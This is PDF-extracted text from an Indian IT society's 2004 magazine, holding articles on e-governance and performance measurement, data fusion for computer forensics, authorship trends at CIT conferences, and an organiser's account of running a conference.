and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

